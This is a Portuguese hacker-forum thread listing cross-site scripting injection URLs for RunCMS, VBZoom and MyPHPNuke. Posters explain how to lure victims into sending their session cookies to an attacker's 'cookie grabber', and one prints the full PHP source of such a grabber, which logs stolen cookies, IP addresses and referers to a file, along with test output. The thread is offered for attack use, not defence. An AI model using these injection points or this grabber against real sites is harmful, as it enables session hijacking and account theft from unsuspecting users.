Só algumas falhas recentes envolvendo Cross site Scripting.
RunCMS Bigshow.PHP Cross-Site Scripting Vulnerability
http://www.EXEMPLO.com/ (http://www.exemplo.com/)[ALVO]/modules/downloads/bigshow.php?id=[URL de IMAGEN]'>[CODIGO]
VBZoom Profile.PHP Cross-Site Scripting Vulnerability
http://www.EXEMPLO.com/vz/profile.php?U ... UserName=' (http://www.exemplo.com/vz/profile.php?UserID=1&UserName=')>XSS
MyPHPNuke Multiple Cross-Site Scripting Vulnerabilities
http://www.EXEMPLO.com/reviews.php?op=reviews&letter= (http://www.exemplo.com/reviews.php?op=reviews&letter=)[XSS]
http://www.EXEMPLO.com/download.php?sortby=&dcategory= (http://www.exemplo.com/download.php?sortby=&dcategory=)[XSS]&sortby=
Bem, eu não estudei essas falhas, por isso não posso explica-las. No momento não posso pois estou ocupado... Intão, se deseja saber mais sobre elas:
www.securityfocus.com (http://www.securityfocus.com)
Abraços,
d34d
Onde esta escrito para inserir o cross site script, coloquem o seguinte:
ou
Estas falhas, como voces podem ver pelo codigo de exemplo, permitem que cookies sejam roubados. E como os cookies sao usados tambem para autenticacao de usuarios, pode-se usar cookie poisoning a partir dos dados coletados com o script php. Entao, voce envia a url do servidor vulneravel que contenha o javascript redirecionador para o seu cookie grabber para a vitima. O usuario que nao conhece javascript vai pensar que esta visitando uma pagina do servidor vulneravel (www.exemplo.com (http://www.exemplo.com)), quando na verdade foi redirecionado para a sua pagina, totalmente fora dos dominios do servidor.
Quote from: "Shady"Onde esta escrito para inserir o cross site script, coloquem o seguinte:
ou
Estas falhas, como voces podem ver pelo codigo de exemplo, permitem que cookies sejam roubados. E como os cookies sao usados tambem para autenticacao de usuarios, pode-se usar cookie poisoning a partir dos dados coletados com o script php. Entao, voce envia a url do servidor vulneravel que contenha o javascript redirecionador para o seu cookie grabber para a vitima. O usuario que nao conhece javascript vai pensar que esta visitando uma pagina do servidor vulneravel (www.exemplo.com (http://www.exemplo.com)), quando na verdade foi redirecionado para a sua pagina, totalmente fora dos dominios do servidor.
Boa shady...
Quanto tempo hein? Como vc está? Me re-adiciona no msn:
d34d_d3v1l@hotmail.com
Abraços,
d34d
shady
e onde consigo esse cookiegrabber queria dar uma estudada nele
Heys! Tb estou com o mesmo problema do ratao... onde arranjar esse codigo... vc pode disponiblizar aqui para o pessoal??

Ficaria mt grato...
Abraços,
Shady,
por acaso essa vul que é explorado pelo
cookiegrabber.php, eh com esse coder aqui :
Quote$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'
');
fclose($fp);
?>
//rename it to cookies.php and create one new file steal.php and chmod it to 777
Eu testei esse coder aqui em casa, e ele cria um arquivo cokkies.txt, com os seguintes dados :
QuoteCookie:
IP: 127.0.0.1
Date and Time: 14 May, 2006, 6:24 am
Referer:
Fonte do coder: Milw0rm
ateh +
isso nao vai roubar cookie
para roubar cookie, o php tem que chamar ele e parsar o conteudo dele
rog